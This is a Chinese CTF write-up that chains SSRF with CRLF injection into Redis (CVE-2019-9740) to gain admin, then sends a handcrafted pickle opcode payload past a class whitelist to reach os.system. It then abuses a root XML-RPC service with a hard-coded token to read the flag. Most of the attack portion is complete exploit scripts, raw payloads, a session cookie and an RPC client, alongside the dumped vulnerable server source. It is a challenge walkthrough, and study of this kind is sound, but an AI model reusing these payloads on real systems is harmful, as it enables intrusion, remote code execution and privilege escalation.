Python 2.x(至 2.7.16)的 urllib2 和 Python 3.x(至 3.7.3)的 urllib 存在 CRLF 注入漏洞 CVE-2019-9740,可以进行请求走私;经过测试,本题的 3.7.3 确实受此漏洞影响

基础请求url为:
http://127.0.0.1:6379/\r\npayload\r\n

根据源码,我们不太好直接获取app:secret_key,所以这里选择直接仿照源码中的格式,HSET我的用户为管理员即可,需要执行redis命令:

1
2
3
AUTH redispass123
HSET user:BR role admin
QUIT

对应Payload:
http://127.0.0.1:6379/\r\nAUTH redispass123\r\nHSET user:BR role admin\r\nQUIT\r\n

然后退出重新登录,拿到的就是管理员session

接下来需要打pickle反序列化,存在白名单WAF:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ALLOWED_CLASSES = {
'__main__.OnlineUser': OnlineUser,
'builtins': __builtins__
}

def find_class(self, module: str, name: str):
full_name = f"{module}.{name}"

# 允许builtins模块的基础类型和安全函数
if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
return getattr(__builtins__, name)

# 白名单检查
if full_name in self.ALLOWED_CLASSES:
return self.ALLOWED_CLASSES[full_name]

raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")

常规Payload用不了,需要自行构造opcode
经过本地测试,我们可以从OnlineUser出发,逐步取到os.system

1
OnlineUser.__init__.__globals__["os"].system("whoami")

也等价于

1
getattr(dict.get(getattr(getattr(OnlineUser, "__init__"), "__globals__"), "os"),"system")("whoami")

其中 getattr、dict 都在白名单中,可以利用。
这里利用 pker 工具(EddieIvan01/pker: Automatically converts Python source code to Pickle opcode)编写 Payload,并把回显写入静态目录方便读取

1
2
3
4
5
6
7
8
9
getattr = GLOBAL('builtins', 'getattr')
dict_ = GLOBAL('builtins', 'dict')
dict_get = getattr(dict_, "get")
user = GLOBAL("__main__", "OnlineUser")
init = getattr(user, "__init__")
global_ = getattr(init, "__globals__")
os = dict_get(global_, "os")
getattr(os, "system")("whoami > /app/static/3.txt")
return

得到payload:

1
b"cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'whoami > /app/static/1.txt'\ntR."

使用SET写入到online_user:test

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'whoami > /app/static/1.txt'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
data = base64.b64decode(b64_data).decode("utf-8")
print(data)
except Exception as e:
print(res.text)

即使写入成功也会显示NOAUTH,不过没啥影响,访问/admin/online-users发现有报错说明正确写入并触发了,触发payload后访问/static/1.txt可以获取回显

同样的,执行ls /可以找到/flag,但是权限是400且所属组为root,这意味着需要提权,尝试寻找进程、计划任务、suid等可以利用提权的东西

在执行ps aux发现一个特别的进程,它是root权限运行的

读取源码:file:///opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
#!/usr/bin/env python3
import sys
import os
import subprocess
import json
import platform
import threading
import time
import functools
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCDispatcher
import logging

# Configure logging: INFO level, timestamped format, one module-level logger
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('MCP-Secure-Server')

class RequestHandler(SimpleXMLRPCRequestHandler):
    """XML-RPC request handler whose only configured RPC path is /RPC2."""
    rpc_paths = ('/RPC2',)

class SecureXMLRPCServer(SimpleXMLRPCServer):
    """XML-RPC server that refuses introspection and masks faults.

    Every ``system.*`` call, and every Fault raised by a dispatched method,
    is reported to the client as ``Fault(403, "Authentication failed")``.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._introspection_enabled = False

    def system_listMethods(self):
        """Always refuse to list methods."""
        from xmlrpc.client import Fault
        raise Fault(403, "Authentication failed")

    def system_methodSignature(self, method_name):
        """Always refuse to describe a method signature."""
        from xmlrpc.client import Fault
        raise Fault(403, "Authentication failed")

    def system_methodHelp(self, method_name):
        """Always refuse to return method help."""
        from xmlrpc.client import Fault
        raise Fault(403, "Authentication failed")

    def _dispatch(self, method, params):
        """Dispatch *method* with *params*, hiding introspection and faults.

        Raises:
            Fault: 403 for any ``system.*`` method and for any Fault raised
                by the dispatched method. Other exceptions propagate
                unchanged.
        """
        # Import before any branch: the name is needed by the `except`
        # clause too. Importing it only inside the `if` left it unbound on
        # the normal path, so handling any exception raised
        # UnboundLocalError instead.
        from xmlrpc.client import Fault

        if method.startswith('system.'):
            raise Fault(403, "Authentication failed")

        try:
            return super()._dispatch(method, params)
        except Fault:
            # Do not leak the original fault code or message to the client.
            raise Fault(403, "Authentication failed")

class MCPServerSecure:
    """Token-protected XML-RPC management service.

    Each RPC method is registered through ``_auth_required``, so callers
    must pass the authentication token as the first positional argument.
    """

    def __init__(self, host='0.0.0.0', port=54321):
        """Create the XML-RPC server on ``host:port`` and register methods."""
        self.host = host
        self.port = port
        self.server = SecureXMLRPCServer((host, port),
                                         requestHandler=RequestHandler,
                                         allow_none=True,
                                         logRequests=False)

        # NOTE(review): the token is hard-coded and written to the log below;
        # anyone who can read this file or the log can authenticate.
        self.auth_token = "mcp_secure_token_b2rglxd"

        self.register_methods()

        logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}")
        logger.info(f"认证令牌: {self.auth_token}")
        logger.info(f"服务启动完成,进程ID: {os.getpid()}")

    def verify_token(self, token):
        """Return True only when *token* is a string equal to the auth token.

        Non-string values (XML-RPC may deliver ints, None, ...) are rejected
        outright, and the comparison is constant-time.
        """
        import hmac

        if not isinstance(token, str):
            return False
        return hmac.compare_digest(
            token.encode('utf-8', 'surrogatepass'),
            self.auth_token.encode('utf-8', 'surrogatepass'),
        )

    def _auth_required(self, func):
        """Wrap *func* so that its first argument must be a valid token.

        The wrapper strips the token and forwards the remaining arguments.
        On an invalid token it returns an error dict instead of calling
        *func*.
        """
        @functools.wraps(func)
        def wrapper(token, *args, **kwargs):
            if not self.verify_token(token):
                return {'error': 'Authentication failed. Invalid token.'}
            return func(*args, **kwargs)
        return wrapper

    def register_methods(self):
        """Register every RPC method behind the authentication wrapper."""
        # Each method is exposed under its own name and expects the token as
        # its first argument.
        exposed = (
            'get_server_info',
            'get_system_status',
            'list_files',
            'read_file',
            'execute_command',
            'get_process_list',
            'service_control',
        )
        for name in exposed:
            self.server.register_function(
                self._auth_required(getattr(self, name)),
                name
            )

    # ========== MCP service methods ==========
    def get_server_info(self):
        """Return static information about this server process."""
        return {
            'service': 'Secure Management Control Protocol Server',
            'version': '2.0.0',
            'host': self.host,
            'port': self.port,
            'elevated_privileges': os.geteuid() == 0,
            'pid': os.getpid(),
            'secure': True,
            'auth_required': 'ALL_METHODS'
        }

    def get_system_status(self):
        """Return load, memory, disk and platform information.

        Returns a dict of status fields, or ``{'error': ...}`` if reading
        the ``/proc`` files fails.
        """
        try:
            # Load average
            with open('/proc/loadavg', 'r') as f:
                loadavg = f.read().strip()

            # Memory information
            mem_info = {}
            with open('/proc/meminfo', 'r') as f:
                for line in f:
                    if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line:
                        key, value = line.split(':')
                        mem_info[key.strip()] = value.strip()

            # Disk space of the root filesystem
            disk_info = {}
            try:
                df_output = subprocess.check_output(['df', '-h', '/'],
                                                    stderr=subprocess.DEVNULL,
                                                    text=True)
                lines = df_output.strip().split('\n')
                if len(lines) > 1:
                    parts = lines[1].split()
                    if len(parts) >= 6:
                        disk_info = {
                            'filesystem': parts[0],
                            'size': parts[1],
                            'used': parts[2],
                            'available': parts[3],
                            'use_percent': parts[4],
                            'mounted': parts[5]
                        }
            except Exception:
                # Best effort: a missing or failing ``df`` must not break
                # the rest of the status report.
                disk_info = {'error': 'Unable to get disk info'}

            return {
                'system': platform.system(),
                'node': platform.node(),
                'release': platform.release(),
                'version': platform.version(),
                'machine': platform.machine(),
                'processor': platform.processor(),
                'load_average': loadavg,
                'memory': mem_info,
                'disk': disk_info,
                'uptime': self._get_uptime(),
                'time': time.strftime('%Y-%m-%d %H:%M:%S')
            }
        except Exception as e:
            return {'error': str(e)}

    def _get_uptime(self):
        """Return uptime as ``"<d>d <h>h <m>m"``, or ``"Unknown"`` on failure."""
        try:
            with open('/proc/uptime', 'r') as f:
                uptime_seconds = float(f.readline().split()[0])
        except (OSError, ValueError, IndexError):
            return "Unknown"
        days = int(uptime_seconds // 86400)
        hours = int((uptime_seconds % 86400) // 3600)
        minutes = int((uptime_seconds % 3600) // 60)
        return f"{days}d {hours}h {minutes}m"

    def list_files(self, path='.'):
        """List the entries of directory *path*.

        Returns ``{'path': ..., 'files': [...]}``, or ``{'error': ...}`` when
        the path is rejected or cannot be listed.
        """
        try:
            # NOTE(review): this is a plain prefix check on the raw string.
            # Paths such as '/opt/../etc' or a relative path into a sensitive
            # directory are not caught; normalise before trusting it.
            if '..' in path or path.startswith('/'):
                sensitive_dirs = ('/etc', '/root', '/home', '/var')
                if path.startswith(sensitive_dirs):
                    return {'error': 'Access to sensitive directory restricted'}

            files = []
            for item in os.listdir(path):
                item_path = os.path.join(path, item)
                info = os.stat(item_path)
                files.append({
                    'name': item,
                    'path': item_path,
                    'is_dir': os.path.isdir(item_path),
                    'size': info.st_size,
                    'modified': time.ctime(info.st_mtime),
                    'permissions': oct(info.st_mode)[-3:]
                })
            return {'path': path, 'files': files}
        except Exception as e:
            return {'error': str(e)}

    def read_file(self, filepath):
        """Read up to 5000 characters of *filepath* as UTF-8 text.

        Returns ``{'file', 'content', 'truncated'}``, or ``{'error': ...}``
        when the path is rejected or cannot be read.
        """
        try:
            # NOTE(review): substring/prefix filter only; it does not resolve
            # symlinks or normalise the path.
            if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath:
                return {'error': 'Access to sensitive file restricted'}

            with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read(5000)  # cap the amount returned
            return {
                'file': filepath,
                'content': content,
                'truncated': len(content) == 5000
            }
        except Exception as e:
            return {'error': str(e)}

    def execute_command(self, command):
        """Run *command* through the shell and return its result.

        Returns a dict with the command, return code, stdout, stderr and a
        success flag, or ``{'error': ...}`` on timeout or failure.
        """
        try:
            logger.warning(f"执行命令: {command}")

            # SECURITY: ``shell=True`` with a caller-supplied string is
            # arbitrary command execution with this process's privileges.
            # The token check is the only barrier in front of it.
            result = subprocess.run(
                command,
                shell=True,
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                'command': command,
                'returncode': result.returncode,
                'stdout': result.stdout,
                'stderr': result.stderr,
                'success': result.returncode == 0
            }
        except subprocess.TimeoutExpired:
            return {'error': 'Command execution timeout'}
        except Exception as e:
            return {'error': str(e)}

    def get_process_list(self):
        """Return up to the first 20 processes reported by ``ps aux``."""
        try:
            processes = []
            ps_output = subprocess.check_output(
                ['ps', 'aux'],
                stderr=subprocess.DEVNULL,
                text=True
            )

            lines = ps_output.strip().split('\n')
            # lines[0] is the column header; keep at most 20 process rows.
            for line in lines[1:21]:
                parts = line.split()
                if len(parts) >= 11:
                    processes.append({
                        'user': parts[0],
                        'pid': parts[1],
                        'cpu': parts[2],
                        'mem': parts[3],
                        'vsz': parts[4],
                        'rss': parts[5],
                        'tty': parts[6],
                        'stat': parts[7],
                        'start': parts[8],
                        'time': parts[9],
                        'command': ' '.join(parts[10:])
                    })

            return {'process_count': len(processes), 'processes': processes}
        except Exception as e:
            return {'error': str(e)}

    def service_control(self, service_name, action):
        """Run ``systemctl <action> <service_name>``.

        *action* must be one of start/stop/restart/status. Returns the
        command result as a dict, or ``{'error': ...}``.
        """
        try:
            if action not in ['start', 'stop', 'restart', 'status']:
                return {'error': 'Invalid action. Use start/stop/restart/status'}

            result = subprocess.run(
                ['systemctl', action, service_name],
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                'service': service_name,
                'action': action,
                'returncode': result.returncode,
                'stdout': result.stdout,
                'stderr': result.stderr
            }
        except FileNotFoundError:
            return {'error': 'systemctl not available'}
        except Exception as e:
            return {'error': str(e)}

    def run(self):
        """Serve requests until interrupted, then close the listening socket."""
        logger.info(f"启动安全MCP服务器,监听 {self.host}:{self.port}")
        logger.info("所有方法需要认证令牌")
        try:
            self.server.serve_forever()
        except KeyboardInterrupt:
            logger.info("收到中断信号,关闭服务器")
        finally:
            self.server.server_close()
            logger.info("MCP服务器已关闭")

def main():
    """Warn when not running as root, then start the server on 0.0.0.0:54321."""
    # Check the effective user id; the service still starts without root.
    if os.geteuid() != 0:
        logger.warning("警告:服务未以管理员权限运行,部分功能可能受限")
        logger.warning("建议以管理员权限运行以获得完整功能")

    # Create and run the server (blocks until interrupted).
    server = MCPServerSecure(host='0.0.0.0', port=54321)
    server.run()


if __name__ == '__main__':
    main()

简单审计可以发现:访问 http://127.0.0.1:54321/RPC2 并携带 token `mcp_secure_token_b2rglxd`,即可调用 execute_command 以 root 权限执行系统命令。编写对应的客户端:

1
2
3
4
5
#!/usr/bin/env python
import xmlrpc.client
proxy=xmlrpc.client.ServerProxy("http://localhost:54321/RPC2", allow_none=True)
exec_response=proxy.execute_command("mcp_secure_token_b2rglxd", "cat /flag")
print(exec_response)

利用 echo 与 base64 -d 命令组合,将上述 Python 脚本写入服务器的 /app/static/3.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'echo IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgeG1scnBjLmNsaWVudA0KcHJveHk9eG1scnBjLmNsaWVudC5TZXJ2ZXJQcm94eSgiaHR0cDovL2xvY2FsaG9zdDo1NDMyMS9SUEMyIiwgYWxsb3dfbm9uZT1UcnVlKQ0KZXhlY19yZXNwb25zZT1wcm94eS5leGVjdXRlX2NvbW1hbmQoIm1jcF9zZWN1cmVfdG9rZW5fYjJyZ2x4ZCIsICJjYXQgL2ZsYWciKQ0KcHJpbnQoZXhlY19yZXNwb25zZSk= | base64 -d > /app/static/3.txt'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


# Pull the base64 payload out of the returned page: it is the text between
# ";base64," and the following '" style' inside the image-wrapper <div>.
bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
    data = base64.b64decode(b64_data).decode("utf-8")
    print(data)
except ValueError:
    # binascii.Error and UnicodeDecodeError are both ValueError subclasses;
    # fall back to dumping the raw page when the payload is not decodable.
    print(res.text)

再执行刚写入的脚本,并将输出重定向到 /app/static/flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'python /app/static/3.txt > /app/static/flag'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


# Pull the base64 payload out of the returned page: it is the text between
# ";base64," and the following '" style' inside the image-wrapper <div>.
bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
    data = base64.b64decode(b64_data).decode("utf-8")
    print(data)
except ValueError:
    # binascii.Error and UnicodeDecodeError are both ValueError subclasses;
    # fall back to dumping the raw page when the payload is not decodable.
    print(res.text)

访问/static/flag获得flag